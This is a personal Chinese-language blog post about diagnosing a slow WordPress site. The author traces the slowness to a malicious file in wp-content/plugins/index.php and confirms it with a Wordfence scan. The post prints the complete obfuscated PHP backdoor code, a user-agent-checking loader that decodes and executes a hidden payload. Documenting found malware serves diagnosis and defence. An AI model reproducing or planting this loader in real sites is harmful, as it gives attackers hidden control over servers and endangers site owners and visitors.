关于一段 php 恶意脚本

女票的网站打开很慢,以前一直觉得这是从腾讯云花 1 块钱买的,慢是理所当然的。现在毕业了,享受不到每月 1 块钱的学生优惠政策,得全额付款,就觉得怎么会那么慢呢!不能接受,所以我就得帮忙看一下。

网站慢,我们能感觉得到,但是怎么入手呢?

首先从查看请求开始。

ttfb
ttfb

在没有修复这个问题前,ttfb 的时间达到了 10 多秒,那么什么是 ttfb 呢?谷歌对此有解释:

  • Waiting (TTFB). The browser is waiting for the first byte of a response. TTFB stands for Time To First Byte. This timing includes 1 round trip of latency and the time the server took to prepare the response.

就是浏览器收到第一个字节的时间。这很明显,是我的服务器慢,我怀疑是 php 或者 MySQL 的问题,所以我昨晚还下载了 wp super cache 来将 wordpress 站点静态化,但是依然很慢。

在这个服务器上还运行了其它站点,比如小阁,那么也不是 php 或者 MySQL 的问题,所以我怀疑是哪个 wordpress 插件的问题,就这样找到了那个恶意的 php 代码。

那么我们先来看看这个脚本是啥?点击这里下载:bad

<?php $luupgddt = 'fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**9{d%:osvufs:~928>>  x22#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%) or (strstr($uas,"  x72 166 x3a 61  x3j}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)w6*CW&)7gj6<.[A  x27&6<  x7fw6*  x7f_*#[k2`{vo:>:iuhofm%:-5ppde:4:|:**#ppde# x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#0j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]Kd/#)rrd/#00;quui#>.%!<***f x27,*e  x>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfu  x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`.%)euhA)3of>2bd%!<5h%/#0#/*#np  x24-  x24]26  x24-  x24<%j,,*!| x24-  x24gvodujpo!  x24-  x24y7 x247fmjix6<C  x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#w2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~  s]o]s]#)fepmqyf x27*&7-n%)utjm6<  x7g}x;0]=])0#)U!  x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPw/  x24)%zW%h>EzH,2W%w-%o:W%c:>1<%b:>1<!gps7f_*#fubfsdXk5`{66~6<&w6<  x#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR x27tfut`cpV x7f x7f x7f x x69 157 x6e"; function rgvbtra($n){return c#%#/#o]#/*)323zbe!-#jt0*?]+^?]_  x5c}X #0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpx27!hmg%)!gj!~<ofmy%,3,j%>7f<u%V  x27{ftmfV x7f<*X&fI{*w%)kVx{**#k#)tutjyf`x  x22l:!}V;3q%}U;y]}R;2]},;osvu372]58y]472]37y]672]48y]#>s%<#462]47y]hr(ord($n)-1);} @error_reporting(0); $gerst2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFO{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg x22)!g]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!  *K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA  xrfs%6<#o]1/20QUUI7jsv%7UFH#  x27rfs%6~6< x7fw6<Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,-  x24*<!  x24-  x24gps)%j>1<%j=tj{fpg)% x24-  x24*<!~!  x24/%t2w/ tdz)%bbT-%bT-%hW~%fd5egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tm)tutjyf`4  x223}!+!<+mpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#ftmbg}  x7f;!osvufs}w;* x7f!>>  x22!pdp%!-uyfu%)3of)fepdof`57ftbc x7f!|!*uyP#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#f./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp% 116 x54"]); if ((strstr($uas,"  x6d 163 x69 145")97e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#:>%s:  x5c%j:.2^,%b:<!%c:>%s:  x5c27,*d  x27,*c  x27,*b  x27)fepdof.)fepdojw)# x24#-!#]y38#-!%w:**<")));$qtxiiqd = $ceabqas("", $gersmror (strstr($uas," x66 151 x72 145 x66 157 xx24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2)ujojR  x27id%6<  x7fw6*  x7252]18y]#>q%<#762]67yWsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r  x5c2^-%hOh/#00#W~!%{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j27pd%6|6.7eu{66~67<&w6<*&7-#o]5cq%)ufttj x22)gj6<^#Y#  x5cq% x27Y%6<.msv`ftsbqA7>q%6<  x7fw6*  x111127-K)ebfsX x27u%)d%)uqpuft`msvd},;uqpu7fw6*CW&)7gj6<*doj%7-C)fepmqnf_*#ujojRk3`{666~6<&w6< x7f#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj  x22)gj!|!*nbsbq%)323ldfidk!~!<**qw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!  78"))) { $ceabqas = " x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164)utjm!|!*5!  x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-%!-#1]#-bubE{h%)tpqsut>j%!*72%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}  x27;%!<*#jA x27&6<.fmjgA  x27doj%6< x7fw6*  x7f_*38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)mw>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]227}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-  x24-!%  x24-  x1]211M5]67]452]88]5]48x24<!fwbm)%tjw)bssbz)#")) or (strstr($uas,"  x6opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubEfs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudov*msv%)}.;`UQPMSVD!-is%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*jidsb`bj+upcotn+qsvmt+fmh5]53]Kc#<%tpz!>!#]D6M7]K34-bubE{h%)sutcvt)esp1")) or (strstr($uas," x61 156 x64 162 x6f 151 x6467R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#}_;#)323ldfid>}&;!osvuif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (pi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;23zbek!~!<b% x7f!<X>b%Z<#opo)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%bopjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)3J`GB)fubfsdXA x27K6<  x7fw6*3qj%7>  x2272qj%)7gj6<**2qj%)hopm3qjA)qj3ho364]6]283]427]36]373P6]36]73]83]238M7]38ufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zspph#)zbssb!-#}#)fepmqnj!/!pmA  x273qj%6<*Y%)fnbozcYfvr#  x5cq%7**^#zsfvr#  x0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#6y)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]x24)##-!#~<#/% x24-  x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%cB%iN}#-!!isset($GLOBALS[" x61 156 x75 156 x61"])))) { $GLOB68]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]%)!gj}Z;h!opjudovg}{;#)tutjyf`mrh = implode(array_map("rgvbtra",str_split("%tj81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:52:ftmbg39*56A:>:8:|:7#6#)tutjyf`439d%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA x27pd%6<C x6:!}7;!}6;##}C;!>>!}W;uth); $qtxiiqd();}}24-tusqpt)%z-#:#* x24-  x24!>!  x24/%tjw/ x24)% x24-  x24y4 x24-  x24]y8fs} x7f;!opjudovg}k~~x246767~6<Cw6<pd%w6Z6<.5`hA  x27pd%6<pd%w6Z6<.4`hA x27p24*!|!  x24-  x24 x5c%j^  x24-  x24tvctus)% x24-  x24b!>!%yy)#}#-#  x24-  x>2<!gps)%j>1<%j=6[%w!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfw3 150 x72 157 x6d 145")) ALS["  x61 156 x75 156 x61"]=1; $uas=strtolow{e%+*!*+fepdfe{h+{d%)+er($_SERVER[" x48 124 x54 120 x5f 125 x53 105 x52 137 x41 107 x45]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}5!gj!<*2bd%-#1GO  x22#)fepmqyfA>2b%!<*qp%-*>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)jStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSwexqjzu'; $wyhddjtlfc=explode(chr((484-364)),substr($luupgddt,(35988-29968),(228-194))); $zolzlcjd = $wyhddjtlfc[0]($wyhddjtlfc[(5-4)]); $eyqpxsnf = $wyhddjtlfc[0]($wyhddjtlfc[(6-4)]); if (!function_exists('wmmxjcj')) { function wmmxjcj($ciswolno, $ettwwvevkhx,$jwyjeoenm) { $ajeokaw = NULL; for($ldsnfh=0;$ldsnfh<(sizeof($ciswolno)/2);$ldsnfh++) { $ajeokaw .= substr($ettwwvevkhx, $ciswolno[($ldsnfh*2)],$ciswolno[($ldsnfh*2)+(3-2)]); } return $jwyjeoenm(chr((30-21)),chr((393-301)),$ajeokaw); }; } $ubhlzl = explode(chr((294-250)),'4249,60,5021,51,5712,44,5778,65,2423,49,191,37,4122,50,3825,24,5687,25,2672,43,3369,69,1219,44,1480,42,5165,48,3303,66,5480,54,5299,51,3043,30,876,35,0,39,3136,21,725,51,1976,46,1938,38,1739,34,4567,69,4768,24,4676,66,4792,23,3073,63,1104,27,3178,29,3570,38,1131,68,3985,67,2758,25,3207,27,287,41,5350,24,4309,51,3965,20,3157,21,1636,34,2268,36,5135,30,3849,60,2981,62,3482,29,1889,49,1337,26,427,43,3438,44,4102,20,5952,68,1773,50,228,59,5911,41,633,30,528,35,2574,37,2381,42,5622,65,4052,25,4742,26,1301,36,2234,34,996,66,4505,62,4360,28,3234,69,2304,37,598,35,3511,59,4227,22,5459,21,39,22,5265,34,1589,47,328,32,2214,20,5756,22,4443,62,1199,20,1363,24,2022,51,4172,55,563,35,1387,55,3909,56,911,55,1263,38,2715,43,3665,57,5072,63,3608,57,776,45,1442,38,2783,21,5843,68,3722,59,5534,68,5391,68,663,62,2073,62,4953,68,360,67,4815,68,2155,59,1062,21,2923,58,1522,67,5213,52,2472,70,470,58,4077,25,61,64,1670,69,125,66,2135,20,4883,70,4636,40,3781,22,1823,66,2804,63,1083,21,4388,55,2542,32,966,30,5602,20,821,55,3803,22,2341,40,2867,56,2611,61,5374,17'); $gblxcwhn = $zolzlcjd("",wmmxjcj($ubhlzl,$luupgddt,$eyqpxsnf)); $zolzlcjd=$luupgddt; $gblxcwhn(""); $gblxcwhn=(430-309); $luupgddt=$gblxcwhn-1; ?><?php
恶意代码
恶意代码

下载 wordfence 来扫描一下

修复其余的相似的问题。

  • Filename: wp-content/plugins/index.php
  • File Type: Not a core, theme, or plugin file from wordpress.org.
  • Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: explode(chr((294-250)),’4249,60,5021,51,5712,44,5778,65,2423,49,191,37,4122,50,3825,24,5687,25,2672,43,3369,69,1219,44,1480,42,5165,48,3303,66,. The infection type is: A backdoor known as eawtliul.

为什么会导致慢?

这个话题我们下次再说。

参考链

https://developers.google.com/web/tools/chrome-devtools/network-performance/reference#timing-explanation

作者: 曾小乱

喜欢写点有意思的东西

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据